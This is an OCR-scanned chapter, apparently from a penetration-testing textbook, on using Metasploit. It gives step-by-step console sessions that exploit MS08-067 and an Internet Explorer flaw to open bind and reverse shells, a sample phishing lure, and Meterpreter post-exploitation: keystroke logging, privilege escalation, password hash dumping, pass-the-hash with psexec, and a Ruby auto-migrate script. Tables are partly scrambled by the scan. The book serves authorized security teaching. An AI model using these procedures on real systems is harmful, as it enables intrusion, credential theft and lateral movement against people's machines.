• Metasploit: the big picture 

• Getting Metasploit 

• Using the Metasploit console to launch exploits 

• Exploiting client-side vulnerabilities with Metasploit 

• Penetration testing with Metasploit's Meterpreter 

• Automating and Scripting Metasploit 

• Going further with Metasploit 

Metasploit: The Big Picture 

Metasploit is a free, downloadable framework that makes it very easy to acquire, 
develop, and launch exploits for computer software vulnerabilities. It ships with profes- 
sional-grade exploits for hundreds of known software vulnerabilities. When H.D. 
Moore released Metasploit in 2003, it permanently changed the computer security 
scene. Suddenly, anyone could become a hacker and everyone had access to exploits for 
unpatched and recently patched vulnerabilities. Software vendors could no longer de- 
lay fixing publicly disclosed vulnerabilities, because the Metasploit crew was hard at 
work developing exploits that would be released for all Metasploit users. 

Metasploit was originally designed as an exploit development platform, and we'll 
use it later in the book to show you how to develop exploits. However, it is probably 
more often used today by security professionals and hobbyists as a "point, click, root" 
environment to launch exploits included with the framework. 

We'll spend the majority of this chapter showing Metasploit examples. To save 
space, we'll strategically snip out nonessential text, so the output you see while follow- 
ing along might not be identical to what you see in this book. 

Getting Metasploit 

Metasploit runs natively on Linux, BSD, Mac OS X, Windows (via Cygwin), Nokia 
N900, and jailbroken Apple iPhones. You can enlist in the development source tree 
to get the very latest copy of the framework, or just use the packaged installers from 
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www.metasploit.com/framework/download/. The Windows installer may take quite a 
while to complete as it contains installers for Cygwin, Ruby, Subversion, VNCViewer, 
WinVI, Nmap, WinPcap, and other required packages. 

References 

Installing Metasploit on Mac OS X www.metasploit.com/redmine/projects/ 
framework/wiki/Install_MacOSX 

Installing Metasploit on Other Linux Distributions www.metasploit.com/ 
redmine/projects/framework/wiki/Install_Linux 

Installing Metasploit on Windows www.metasploit.com/redmine/projects/ 
framework/wiki/Install_Windows 



Using the Metasploit Console to Launch Exploits 

Our first Metasploit demo involves exploiting the MS08-067 Windows XP vulnerability 
that led to the Conficker superworm of late 2008-early 2009. Well use Metasploit to 
get a remote command shell running on the unpatched Windows XP machine. Meta- 
sploit can pair any Windows exploit with any Windows payload. So, we can choose the 
MS08-067 vulnerability to open a command shell, create an administrator, start a re- 
mote VNC session, or do a bunch of other stuff discussed later in the chapter. Let's get 
started. 

$ . /msf console 



888 888 d8b888 

888 888 Y8P888 

888 888 888 

88888b. d88b. ,d88b. 888888 8888b. ,d8888b 88888b. 888 ,d88b. 888888888 

888 "888 " 8 8bd8P Y8b888 "88b88K 888 "88b888d88""88b888888 

888 888 88888888888888 . d8 8 8 8 8 8 " Y8 88 8b . 8 88 888888888 888888888 

888 888 888Y8b . Y88b. 888 888 X88888 d88P88 8Y88 . . 88P88 8Y8 8b . 

888 888 888 "Y8888 "Y888"Y888888 88888P' 88888P" 888 "Y88P" 888 "Y888 



=[ metasploit v3.4.0-dev [core:3.4 apizl.O] 
+ -- --=[ 317 exploits - 93 auxiliary 
+ -- --=[ 216 payloads - 20 encoders - 6 nops 

=[ svn r9114 updated today (2010.04.20) 

msf > 

The interesting commands to start with are 

show <exploits | payloads> 
info <exploit | payload> <name> 
use <exploit-name> 



You'll find all the other commands by typing help or ?. To launch an MS08-067 
exploit, we'll first need to find the Metasploit name for this exploit. We can use the 
search command to do so: 
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msf > search ms08-067 

[*] Searching loaded modules for pattern 'ms08-067 ' . . . 
Exploits 



Name Rank Description 



windows/smb/ms08_067_netapi great Microsoft Server Service Relative Path 

Stack Corruption 

The Metasploit name for this exploit is windows/smb/ms08_067_netapi. Well use 
that exploit and then go looking for all the options needed to make the exploit work: 

msf > use windows/smb/ms08_067_netapi 
msf exploit (ms08_067_netapi) > 

Notice that the prompt changes to enter "exploit mode" when you use an exploit mod- 
ule. Any options or variables you set while configuring this exploit will be retained so 
that you don't have to reset the options every time you run it. You can get back to the 
original launch state at the main console by issuing the back command: 

msf exploit (ms08_067_netapi) > back 
msf > use windows/smb/ms08_0 67_netapi 
msf exploit (ms08_067_netapi) > 

Different exploits have different options. Let's see what options need to be set to 
make the MS08-067 exploit work: 

msf exploit (ms08_067_netapi) > show options 
Module options : 

Name Current Setting Required Description 



RHOST yes The target address 

RPORT 445 yes Set the SMB service port 

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) 

This exploit requires a target address, the port number on which SMB (Server Mes- 
sage Block) listens, and the name of the pipe exposing this functionality: 

msf exploit (ms08_067_netapi) > set RHOST 192.168.1.6 
RHOST => 192.168.1.6 

As you can see, the syntax to set an option is as follows: 

set <OPTION-NAME> <option> 




NOTE Earlier versions of Metasploit were particular about the case of the 
option name and option, so examples in this chapter always use uppercase if 
the option is listed in uppercase. 



With the exploit module set, we next need to set the payload. The payload is the ac- 
tion that happens after the vulnerability is exploited. It's like choosing how you want 
to interact with the compromised machine if the vulnerability is triggered successfully. 
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For this first example, let's use a payload that simply opens a command shell listening 
on a TCP port: 



> search "Windows Command Shell" 
for pattern 'Windows Command Shell'... 



msf exploit (ms08_067_netapi ) 

[*] Searching loaded modules 
Compatible Payloads 

Name 

windows/ shell/bind_ipv6_tcp 
windows/ shell/bind_nonx_tcp 
windows/ shell/bind_tcp 
windows/ shell/ reverse_ipv6_tcp 
windows/ shell/ reverse_nonx_tcp 
windows/ shell/ reverse_ord_tcp 
windows/ shell/ reverse_tcp 
windows/ shell/ reverse_tcp_allports 
windows/ shell/ reverse_tcp_dns 
windows/ shell_bind_tcp 
windows/ shell_reverse_tcp 



Rank 


Description 




normal 


Windows Command Shell, 
Stager (IPv6) 


Bind TCP 


normal 


Windows Command Shell, 
Stager (No NX Support) 


Bind TCP 


normal 


Windows Command Shell, 
Stager 


Bind TCP 


normal 


Windows Command Shell, 
TCP Stager (IPv6) 


Reverse 


normal 


Windows Command Shell, Reverse 
TCP Stager (No NX Support) 


normal 


Windows Command Shell, 
Ordinal TCP Stager 


Reverse 


normal 


Windows Command Shell, 
TCP Stager 


Reverse 


normal 


Windows Command Shell, 
All-Port TCP Stager 


Reverse 


normal 


Windows Command Shell, 
TCP Stager (DNS) 


Reverse 


normal 


Windows Command Shell, 
Inline 


Bind TCP 


normal 


Windows Command Shell, 
Inline 


Reverse TCP 



In typical gratuitous Metasploit style, there are 11 payloads that provide a Windows 
command shell. Some open a listener on the host, some cause the host to "phone 
home" to the attacking workstation, some use IPv6, some set up the command shell in 
one network roundtrip ("inline"), while others utilize multiple roundtrips ("staged"). 
One even connects back to the attacker tunneled over DNS. This Windows XP target 
virtual machine does not have a firewall enabled, so well use a simple windows/shell/ 
bind_tcp exploit: 

msf exploit (ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp 

If the target were running a firewall, we might instead choose a payload that would 
cause the compromised workstation to connect back to the attacker ("reverse"): 

msf exploit (ms08_067_netapi) > show options 
Module options: 

Name Current Setting Required Description 

RHOST 192.168.1.6 yes The target address 

RPORT 445 yes Set the SMB service port 

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) 

Payload options (windows/shell/bind_tcp) : 
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Name 



Current Setting Required Description 



EXITFUNC 


thread 


yes 


LPORT 


4444 


yes 


RHOST 


192 .168.1.6 


no 



Exit technique: seh, thread, process 
The local port 
The target address 



By default, this exploit will open a listener on tcp port4444, allowing us to connect 
for the command shell. Let's attempt the exploit: 

msf exploit (ms08_067_netapi) > exploit 
[*] Started bind handler 

[*] Automatically detecting the target... 

[*] Fingerprint: Windows XP Service Pack 2 - lang: English 
[*] Selected Target: Windows XP SP2 English (NX) 

[*] Attempting to trigger the vulnerability. . . 

[*] Sending stage (240 bytes) to 192.168.1.6 

[*] Command shell session 1 opened (192.168.1.4:49623 -> 192.168.1.6:4444) 
Microsoft Windows XP [Version 5.1.2600] 

(C) Copyright 1985-2001 Microsoft Corp. 

C : \WINDOWS\system32>echo wOOt! 
echo wOOt! 
wOOt ! 



It worked! We can verify the connection by issuing the netstat command from the 
Windows XP machine console, looking for established connections on port 4444: 

C:\>netstat -ano | findstr 4444 | findstr ESTABLISHED 

TCP 192.168.1.6:4444 192.168.1.4:49623 ESTABLISHED 964 

Referring back to the Metasploit output, the exploit attempt originated from 
192.168.1.4:49623, matching the output we see in netstat. Let's try a different payload. 
Press ctrl-z to put this session into the background: 

C : \>^Z 

Background session 1? [y/N] y 
msf exploit (ms08_067_netapi) > 

Now set the payload to windows/shell/reverse_tcp, the reverse shell that we dis- 
covered: 



msf exploit (ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp 

PAYLOAD => windows/shell/reverse_tcp 

msf exploit (ms08 067 netapi) > show options 



Module options : 

Name Current Setting Required 



RHOST 192.168.1.6 yes 

RPORT 445 yes 

SMBPIPE BROWSER yes 

Payload options (windows/shell/reverse 
Name Current Setting Required 



EXITFUNC thread yes 
LHOST yes 
LPORT 4444 yes 



Description 



The target address 

Set the SMB service port 

The pipe name to use (BROWSER, SRVSVC) 

tcp) : 

Description 



Exit technique: seh, thread, process 
The local address 
The local port 
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This payload requires an additional option, LHOST. The victim needs to know to 
which host to connect when the exploit is successful. 

msf exploit (ms08_067_netapi) > set LHOST 192.168.1.4 
LHOST => 192.168.1.4 

msf exploit (ms08_067_netapi) > exploit 
[*] Started reverse handler on 192.168.1.4:4444 
[*] Automatically detecting the target... 

[*] Fingerprint: Windows XP Service Pack 2 - lang: English 
[*] Selected Target: Windows XP SP2 English (NX) 

[*] Attempting to trigger the vulnerability. . . 

[*] Sending stage (240 bytes) to 192.168.1.6 

[*] Command shell session 2 opened (192.168.1.4:4444 -> 192.168.1.6:1180) 

(C) Copyright 1985-2001 Microsoft Corp. 

C : \WINDOWS\system32>echo wOOt! 
echo wOOt! 
wOOt ! 



Notice that this is "session 2." Press ctrl-z to put this session in the background and go 
back to the Metasploit prompt. Then, issue the command sessions -1 to list all active 
sessions: 



Background session 2? [y/N] y 

msf exploit (ms08_067_netapi) > sessions -1 

Active sessions 



Id Type Information Connection 



1 shell 192.168.1.4:49623 -> 

192.168.1.6:4444 

2 shell Microsoft Windows XP [Version 5.1.2600] 192.168.1.4:4444 -> 

192.168.1.6:1180 

It's easy to bounce back and forth between these two sessions. Just use the sessions -i 
<session>. If you don't get a prompt immediately, try pressing enter. 

msf exploit (ms08_067_netapi) > sessions -i 1 
[*] Starting interaction with 1... 

C : \> A Z 

Background session 1? [y/N] y 
msf exploit (ms08_067_netapi) > sessions -i 2 
[*] Starting interaction with 2... 

C : \WINDOWS\system32> 

You now know the most important Metasploit console commands and understand 
the basic exploit-launching process. Next, we'll explore other ways to use Metasploit in 
the penetration testing process. 



References 

Metasploit exploits and payloads www.metasploit.com/framework/modules/ 
Microsoft Security Bulletin MS08-067 www.microsoft.com/technet/security/ 
bulletin/MS08-067.mspx 
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Exploiting Client-Side Vulnerabilities 
with Metasploit 

A Windows XP workstation missing the MS08-067 security update and available on the 
local subnet with no firewall protection is not common. Interesting targets are usually 
protected with a perimeter or host-based firewall. As always, however, hackers adapt to 
these changing conditions with new types of attacks. Chapters 16 and 23 will go into 
detail about the rise of client-side vulnerabilities and will introduce tools to help you 
find them. As a quick preview, client-side vulnerabilities are vulnerabilities in client soft- 
ware such as web browsers, e-mail applications, and media players. The idea is to lure a 
victim to a malicious website or to trick him into opening a malicious file or e-mail. 
When the victim interacts with attacker-controlled content, the attacker presents data 
that triggers a vulnerability in the client-side application parsing the malicious content. 
One nice thing (from an attacker's point of view) is that connections are initiated by the 
victim and sail right through the firewall. 

Metasploit includes many exploits for browser-based vulnerabilities and can act as 
a rogue web server to host those vulnerabilities. In this next example, we'll use Meta- 
sploit to host an exploit for MS 10-022, the most recently patched Internet Explorer- 
based vulnerability at the time of this writing. To follow along, you'll need to remove 
security update MS 10-022 on the victim machine: 



msf > search msl0_022 

[*] Searching loaded modules for pattern 'msl0_022 ' . . . 
Exploits 



Rank Description 



windows/browser/msl0_022_ie_vbscript_winhlp32 great Internet Explorer 

Winhlp32.exe MsgBox Code 
Execution 

msf > use windows/browser/msl0_022_ie_vbscript_winhlp32 
msf exploit (msl0_022_ie_vbscript_winhlp32 ) > show options 
Module options : 

Name Current Setting Required Description 



Name 



SRVHOST 0 . 0 . 0 . 0 yes 

SRVPORT 80 yes 

SSL false no 

SSLVersion SSL3 no 

URIPATH / yes 



The local host to listen on. 

The daemon port to listen on 
Negotiate SSL for incoming connections 
Specify the version of SSL that 
should be used (accepted: SSL2, SSL3, 
TLS1 ) 

The URI to use. 



Metasploit' s browser-based vulnerabilities have an additional required option, URI- 
PATH. Metasploit will act as a web server, so the URIPATH is the rest of the URL to 
which you'll be luring your victim. For example, you could send out an e-mail that 
looks like this: 

"Dear <victim>, Congratulations! You've won one million dollars! For pickup 
instructions, click here: <link>" 
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A good link for that kind of attack might be http://<IP-ADDRESS>/you_win.htm. 
In that case, you would want to set the URIPATH to you_win.htm. For this example, we 
will leave the URIPATH set to the default, 

msf exploit (msl0_022_ie_vbscript_winhlp32 ) > set PAYLOAD 

windows/ shell_reverse_tcp 

PAYLOAD => windows/shell_reverse_tcp 

msf exploit (msl0_022_ie_vbscript_winhlp32 ) > set LHOST 192.168.0.211 
LHOST => 192.168.0.211 

msf exploit (msl0_022_ie_vbscript_winhlp32 ) > show options 
Module options : 

Name Current Setting Required Description 



SRVHOST 


0.0. 0.0 


yes 


The local host to listen on. 


SRVPORT 


80 


yes 


The daemon port to listen on 


SSL 


false 


no 


Negotiate SSL for incoming connections 


SSLVersion SSL3 


no 


Specify the version of SSL that 
should be used (accepted: SSL2, SSL3, 
TLS1 ) 


URIPATH 


/ 


yes 


The URI to use. 


Payload options (windows/shell 


. reverse 


_tcp) : 


Name 


Current Setting 


Required 


Description 


EXITFUNC 


process 


yes 


Exit technique: seh, thread, process 


LHOST 


192.168.0.211 


yes 


The local address 


LPORT 


4444 


yes 


The local port 



msf exploit (msl0_022_ie_vbscript_winhlp32 ) > exploit 
[*] Exploit running as background job. 
msf exploit (msl0_022_ie_vbscript_winhlp32 ) > 

[*] Started reverse handler on 192.168.0.211:4444 
[*] Using URL: http : / / 0 . 0 . 0 . 0 : 8 0/ 

[*] Local IP: http : //192 . 168 . 0 . 211 : 80/ 

[*] Server started. 

Metasploit is now waiting for any incoming connections on port 80. When HTTP 
connections come in on that channel, Metasploit will present an exploit for MS 10-022 
with a reverse shell payload instructing Internet Explorer to initiate a connection back 
to 192.168.0.211 on destination port 4444. Let's see what happens when a workstation 
missing Microsoft security update MS 10-022 visits the malicious web page and clicks 
through the prompts: 

[*] Command shell session 1 opened (192.168.0.211:4444 -> 192.168.0.20:1326) 

Aha! We have our first victim! 

msf exploit (msl0_022_ie_vbscript_winhlp32 ) > sessions -1 
Active sessions 



Id Type Information Connection 



1 shell 192.168.0.211:4444 -> 192.168.0.20:1326 

msf exploit (msl0_022_ie_vbscript_winhlp32 ) > sessions -i 1 
[*] Starting interaction with 1... 

’ \\192 .168 . 0 . 2 11 \UDmHoWKE8M5B j DR ' 
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CMD.EXE was started with the above path as the current directory. 

UNC paths are not supported. Defaulting to Windows directory. 

Microsoft Windows XP [Version 5.1.2600] 

(C) Copyright 1985-2001 Microsoft Corp. 

C:\WINDOWS>echo wOOt! 
echo wOOt! 
wOOt ! 

Pressing ctrl-z will return you from the session back to the Metasploit console 
prompt. Let's simulate a second incoming connection: 

[*] Command shell session 2 opened (192.168.0.211:4444 -> 192.168.0.20:1334) 
msf exploit (msl0_022_ie_vbscript_winhlp32 ) > sessions -1 
Active sessions 



Id Type Information Connection 



1 shell 192.168.0.211:4444 -> 192.168.0.20:1326 

2 shell 192.168.0.211:4444 -> 192.168.0.20:1334 

The jobs command will list the exploit jobs you currently have active: 

msf exploit (msl0_022_ie_vbscript_winhlp32 ) > jobs 
Id Name 

1 Exploit: windows/browser/msl0_022_ie_vbscript_winhlp32 

With two active sessions, let's kill our exploit: 

msf exploit (msl0_022_ie_vbscript_winhlp32 ) > jobs -K 
Stopping all jobs... 

[*] Server stopped. 



Exploiting client-side vulnerabilities by using Metasploit's built-in web server will 
allow you to attack workstations protected by a firewall. Let's continue exploring Meta- 
sploit by looking at other ways to use the framework. 



Penetration Testing with Metasploit’s 
Meterpreter 

Having a command prompt is great. However, often it would be convenient to have 
more flexibility after you've compromised a host. And in some situations, you need to 
be so sneaky that even creating a new process on a host might be too much noise. That's 
where the Meterpreter payload shines! 

The Metasploit Meterpreter is a command interpreter payload that is injected into 
the memory of the exploited process and provides extensive and extendable features to 
the attacker. This payload never actually hits the disk on the victim host; everything is 
injected into process memory with no additional process created. It also provides a 
consistent feature set no matter which platform is being exploited. The Meterpreter is 
even extensible, allowing you to load new features on-the-fly by uploading DLLs to the 
target system's memory. 
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To introduce the Meterpreter, we'll reuse the MS 10-022 browser-based exploit with 
the Meterpreter payload rather than the reverse shell payload: 

msf exploit (msl0_022_ie_vbscript_winhlp32 ) > set PAYLOAD 

windows/meterpreter/ reverse_tcp 

PAYLOAD => windows/meterpreter/reverse_tcp 

msf exploit (msl0_022_ie_vbscript_winhlp32 ) > show options 

Module options : 

Name Current Setting Required Description 



SRVHOST 


0.0. 0.0 


yes 


The local host to listen on. 


SRVPORT 


80 


yes 


The daemon port to listen on 


SSL 


false 


no 


Negotiate SSL for incoming connections 


SSLVersion SSL3 


no 


Specify the version of SSL that 
should be used (accepted: SSL2, SSL3, 
TLS1 ) 


URIPATH 


/ 


yes 


The URI to use. 


Payload options (windows/meterpreter/reverse_tcp) : 


Name 


Current Setting 


Required 


Description 


EXITFUNC 


process 


yes 


Exit technique: seh, thread, process 


LHOST 


192.168.0.211 


yes 


The local address 


LPORT 


4444 


yes 


The local port 



msf exploit (msl0_022_ie_vbscript_winhlp32 ) > exploit 
[*] Exploit running as background job. 
msf exploit (msl0_022_ie_vbscript_winhlp32 ) > 

[*] Started reverse handler on 192.168.0.211:4444 
[*] Using URL: http : / / 0 . 0 . 0 . 0 : 8 0/ 

[*] Local IP: http : //192 . 168 . 0 . 211 : 80/ 

[*] Server started. 

[*] Request for "/" does not contain a sub-directory, redirecting to 
/alpR70kupCu5U/ ... 

[*] Responding to GET request from 192.168.0.20:1335 

[*] Meterpreter session 3 opened (192.168.0.211:4444 -> 192.168.0.20:1340) 

The exploit worked again. Let's check our session listing: 

msf exploit (msl0_022_ie_vbscript_winhlp32 ) > sessions -1 
Active sessions 



Id Type Information Connection 

1 shell 192.168.0.211:4444 -> 192.168.0.20:1326 

2 shell 192.168.0.211:4444 -> 192.168.0.20:1334 

3 meterpreter TESTl\admin @ TEST1 192.168.0.211:4444 -> 192.168.0.20:1340 

We now have two command shells from previous examples and one new Meter- 
preter session. Let's interact with the Meterpreter session: 

msf exploit (msl0_022_ie_vbscript_winhlp32 ) > sessions -i 3 
[*] Starting interaction with 3... 
meterpreter > 

The help command will list all the built-in Meterpreter commands. The entire com- 
mand list would fill several pages, but here are some of the highlights: 
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ps 

migrate 

download 

upload 

run 

use 

keyscan_start 

keyscan_stop 

portfwd 

route 

execute 

getpid 

getuid 

getsystem 

hashdump 

screenshot 



List running processes 

Migrate the server to another process 

Download a file or directory 

Upload a file or directory 

Executes a meterpreter script 

Load a one or more meterpreter extensions 

Start capturing keystrokes 

Stop capturing keystrokes 

Forward a local port to a remote service 

View and modify the routing table 

Execute a command 

Get the current process identifier 

Get the user that the server is running as 

Attempt to elevate your privilege to that of local system. 

Dumps the contents of the SAM database 

Grab a screenshot of the interactive desktop 



Let's start with the ps and migrate commands. Remember that the Meterpreter pay- 
load typically runs within the process that has been exploited. (Meterpreter paired with 
the MS 10-022 is a bit of a special case.) So as soon as the user closes that web browser, 
the session is gone. In the case of these client-side exploits especially, you'll want to 
move the Meterpreter out of the client-side application's process space and into a pro- 
cess that will be around longer. A good target is the user's explorer.exe process. Explorer, 
exe is the process that manages the desktop and shell, so as long as the user is logged 
in, explorer.exe should remain alive. In the following example, we'll use the ps com- 
mand to list all running processes and the migrate command to migrate the Meter- 
preter over to explorer.exe: 

meterpreter > ps 
Process list 

PID Name Arch Session User Path 



0 [System Process] 

4 System x86 0 

332 smss.exe x86 0 

\SystemRoot\System32\smss . exe 
548 csrss.exe x86 0 

\??\C : \WINDOWS\system32\csrss . exe 
572 winlogon.exe x86 0 

\ ??\C : \ WINDOWS \system3 2 \winlogon . exe 
616 services.exe x86 0 

C : \WINDOWS\system32\services . exe 
628 lsass.exe x86 0 

C : \WINDOWS\system32 \lsass . exe 
788 svchost.exe x86 0 

C : \WINDOWS\system32\svchost . exe 
868 svchost.exe x86 0 

C : \WINDOWS\system32\svchost . exe 
964 svchost.exe x86 0 

C : \WINDOWS\System32\svchost . exe 
1024 svchost.exe x86 0 

C : \WINDOWS\system32\svchost . exe 
1076 svchost.exe x86 0 

C : \WINDOWS\system32\svchost . exe 
1420 explorer.exe x86 0 

C : \ WINDOWS \Explorer . EXE 



NT AUTHORITY\ SYSTEM 
NT AUTHORITY\ SYSTEM 
NT AUTHORITYXSYSTEM 
NT AUTHORITYXSYSTEM 
NT AUTHORITYXSYSTEM 
NT AUTHORITYXSYSTEM 

NT AUTHORITYXSYSTEM 



TEST1 Xadmin 
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meterpreter > migrate 1420 
[*] Migrating to 1420... 

[*] Migration completed successfully, 
meterpreter > getpid 
Current pid: 1420 
meterpreter > getuid 
Server username: TESTl\admin 

Great, now our session is less likely to be terminated by a suspicious user. 

When pen-testing, your goals will often be to elevate privileges, establish a stronger 
foothold, and expand access to other machines. In this demo example, so far we have a 
Meterpreter session running as TESTl\admin. This local workstation account is better 
than nothing, but it won't allow us to expand access to other machines. Next, we'll ex- 
plore the ways Meterpreter can help us expand access. 

Use Meterpreter to Log Keystrokes 

If we enable Meterpreter's keystroke logger, perhaps the user will type his credentials 
into another machine, allowing us to jump from TEST1 to another machine. Here's an 
example using Meterpreter's keylogger: 

meterpreter > use priv 
Loading extension priv ... success . 
meterpreter > keyscan_start 
Starting the keystroke sniffer... 
meterpreter > keyscan_dump 
Dumping captured keystrokes... 

putty.exe <Return> 192.168.0.21 <Return> admin <Return> P@ssw0rd <Return> 
meterpreter > keyscan_stop 
Stopping the keystroke sniffer... 

To enable the keylogger, we first needed to load the "priv" extension. We would be 
unable to load the priv extension without administrative access on the machine. In this 
(artificial) example, we see that after we enabled the keystroke logger, the user launched 
an SSH client and then typed in his credentials to log in over SSH to 192.168.0.21. 
Bingo! 

Use Meterpreter to Run Code as a Different Logged-On User 

If your Meterpreter session is running as a local workstation administrator, you can 
migrate the Meterpreter to another user's process just as easily as migrating to the ex- 
ploited user's explorer.exe process. The only trick is that the ps command might not list 
the other logged-on users unless the Meterpreter is running as LOCALSYSTEM. Thank- 
fully, there is an easy way to elevate from a local Administrator to LOCALSYSTEM, as 
shown in the following example: 

meterpreter > getuid 
Server username: TESTl\admin 
meterpreter > getpid 
Current pid: 1420 
meterpreter > ps 
Process list 



PID Name 



Arch Session User 



Path 
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1420 


explorer . exe 


x8 6 


0 


TEST1 \admin 


C : \ WINDOWS \Explorer . EXE 








1708 


iexplore . exe 


x8 6 


0 


TEST1 \admin 



C:\Program Files\Internet Explorer\iexplore.exe 
2764 cmd.exe x86 0 

C : \WINDOWS\system32\cmd.exe 

Here we see three processes. PID 1420 is the explorer.exe process in which our Me- 
terpreter currently runs. PID 1708 is an Internet Explorer session that was exploited by 
the Metasploit exploit. PID 2764 is a cmd.exe process with no "User" listed. This is 
suspicious. If we elevate from TESTl\admin to LOCALSYSTEM, perhaps we'll get more 
information about this process: 

meterpreter > use priv 

Loading extension priv ... success . 

meterpreter > getsystem 

...got system (via technique 1). 

meterpreter > getuid 

Server username: NT AUTHORITY\ SYSTEM 
meterpreter > ps 

2764 cmd.exe x86 0 TEST\domainadmin 

C : \WINDOWS\system32 \cmd . exe 



Aha! This PID 2764 cmd.exe process was running as a domain administrator. We 
can now migrate to that process and execute code as the domain admin: 

meterpreter > migrate 2764 
[*] Migrating to 2764... 

[*] Migration completed successfully, 
meterpreter > getuid 
Server username: TEST\domainadmin 
meterpreter > shell 
Process 2404 created. 

Channel 1 created. 

Microsoft Windows XP [Version 5.1.2600] 

(C) Copyright 1985-2001 Microsoft Corp. 

C : \ WINDOWS \system3 2 > 

Now we have a command prompt running in the context of the domain admin. 

Use Interpreter's hashdump Command and Metasploit’s psexec 
Command to Log In Using a Shared Password 

Administrators tend to reuse the same password on multiple computers, especially 
when they believe the password to be difficult to guess. Metasploifs Meterpreter can 
easily dump the account hashes from one box and then attempt to authenticate to an- 
other box using only the username and hash. This is a very effective way while penetra- 
tion testing to expand your access. Start by using the Meterpreter's hashdump com- 
mand to dump the hashes in the SAM database of the compromised workstation: 

meterpreter > use priv 

Loading extension priv ... success . 

meterpreter > hashdump 
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Administrator :500:921988ba001dc8el22c34254e51bff62: 

2 17e50203a5aba59cef a8 63c724bf 61b : : : 

Guest : 501 : aad3b435b51404eeaad3b435b51404ee : 

31d6cfe0dl6ae931b73c59d7e0c089c0: : : 

sharedadmin : 1006 : aad3b435b51404eeaad3b435b51404ee : 

63bef0bd84d48389de9289f4a216031d: : : 

This machine has three local workstation accounts: Administrator, Guest, and 
sharedadmin. If that account named sharedadmin is also present on other machines 
managed by the same administrator, we can use the psexec exploit to create a new ses- 
sion without even cracking the password: 



msf > search psexec 

windows /smb/psexec excellent Microsoft Windows Authenticated 



User Code Execution 

msf > use windows/smb/psexec 

msf exploit (psexec) > show options 

Module options : 

Name Current Setting Required 



RHOST yes 

RPORT 445 yes 

SMBPass no 

SMBUser Administrator yes 



Description 



The target address 

Set the SMB service port 

The password for the specified username 

The username to authenticate as 



To use psexec as an exploit, you'll need to set the target host, the user (which de- 
faults to "Administrator"), and the password. We don't know sharedadmin's pass- 
word. In fact, hashdump has reported only the placeholder value for the LM hash 
(aad3b435b51404eeaad3b435b51404ee). That means that the password is not stored 
in the legacy, easy-to-crack format, so it's unlikely we can even crack the password from 
the hash without a lot of computing horsepower. What we can do, however, is supply 
the hash in place of the password to the psexec module: 




NOTE The psexec module does not actually exploit any vulnerability. It is 
simply a convenience function supplied by Metasploit to execute a payload if 
you already know an administrative account name and password (or password 
equivalent such as hash, in this case). 



msf exploit (psexec) > set RHOST 192.168.1.6 
RHOST => 192.168.1.6 

msf exploit (psexec) > set SMBUser sharedadmin 
SMBUser => sharedadmin 

msf exploit (psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee : 
63bef0bd84d48389de9289f4a216031d 

SMBPass => aad3b435b51404eeaad3b435b51404ee: 63bef0bd84d48389de9289f4a216031d 
msf exploit (psexec) > set PAYLOAD windows /meterpreter/bind_tcp 
PAYLOAD => windows /meterpreter/bind_tcp 
msf exploit (psexec) > exploit 
[*] Started bind handler 
[*] Connecting to the server. . . 

[*] Authenticating as user 'sharedadmin'... 

[*] Meterpreter session 8 opened (192.168.1.4:64919 -> 192.168.1.6:4444) 
meterpreter > 
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With access to an additional compromised machine, we could now see which users are 
logged onto this machine and migrate to a session of a domain user. Or we could install a 
keylogger on this machine. Or we could dump the hashes on this box to find a shared 
password that works on additional other workstations. Or we could use Meterpreter to 
"upload" gsecdump.exe to the newly compromised workstation, drop into a shell, and 
execute gsecdump.exe to get the cleartext secrets. Meterpreter makes pen-testing easier. 

References 

Metasploit's Meterpreter (Matt Miller aka skape) www.metasploit.com/documents/ 
meterpreter.pdf 

Metasploit Unleashed online course (David Kennedy et al.) 

www.offensive-security.com/metasploit-unleashed/ 

Automating and Scripting Metasploit 

The examples we have shown so far have all required a human at the keyboard to 
launch the exploit and, similarly, a human typing in each post-exploitation command. 
On larger-scale penetration test engagements, that would, at best, be monotonous or, 
worse, cause you to miss exploitation opportunities because you were not available to 
immediately type in the necessary commands to capture the session. Thankfully, Meta- 
sploit offers functionality to automate post-exploitation and even build your own 
scripts to run when on each compromised session. Let's start with an example of auto- 
mating common post-exploitation tasks. 

When we introduced client-side exploits earlier in the chapter, we stated that the 
exploit payload lives in the process space of the process being exploited. Migrating the 
Meterpreter payload to a different process — such as explorer.exe — was the solution to 
the potential problem of the user closing the exploited application and terminating the 
exploit. But what if you don't know when the victim will click the link? Or what if you 
are attempting to exploit hundreds of targets? That's where the Metasploit Auto- 
RunScript comes in. Check out this example: 

msf exploit (msl0_002_aurora) > set AutoRunScript "migrate explorer.exe" 
AutoRunScript => migrate explorer.exe 
msf exploit (msl0_002_aurora) > exploit -j 

[*] Meterpreter session 12 opened (192.168.1.4:4444 -> 192.168.1.9:1132) 

[*] Session ID 12 (192.168.1.4:4444 -> 192.168.1.9:1132) processing 
AutoRunScript 'migrate explorer.exe' 

[*] Current server process: iexplore.exe (1624) 

[*] Migrating to explorer.exe... 

[*] Migrating into process ID 244 

[*] New server process: Explorer.EXE (244) 

In this example, we set the AutoRunScript variable to the "migrate" script, passing 
in the name of the process to which we'd like the session migrated. The AutoRunScript 
runs shortly after the payload is established in memory. In this case, Internet Explorer 
(iexplore.exe) with PID 1624 was the process being exploited. The migrate script found 
Explorer.EXE running with PID 244. The Meterpreter migrated itself from the IE 
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session with PID 1624 over to the Explorer.EXE process with PID 244 with no human 
interaction. 

You can find all the available Meterpreter scripts in your Metasploit installation 
under msf3/scripts/meterpreter. You can also get a list of available scripts by typing 
run [spacebar] [tab] into a meterpreter session. They are all written in Ruby. The 
migrate.rb script is actually quite simple. And if we hardcode explorer.exe as the pro- 
cess to which we'd like to migrate, it becomes even simpler. Here is a working migrate_ 
to_explorer.rb script: 

server = client . sys . process . open 

print_status ("Current server process: #{ server . name } (#{ server .pid} )" ) 

target_pid = client . sys .process ["explorer . exe"] 

print_status ( "Migrating into process ID # { target_pid} " ) 

client . core .migrate (target_pid) 

server = client . sys . process . open 

print_status ( "New server process: #{ server . name } (#{ server .pid} )" ) 




NOTE The real migrate.rb script is more robust, more verbose, and more 
elegant.This is simplified for ease of understanding. 



Metasploit ships with Meterpreter scripts to automate all kinds of useful tasks. From 
enumerating all information about the system compromised to grabbing credentials to 
starting a packet capture, if you've thought about doing something on startup for every 
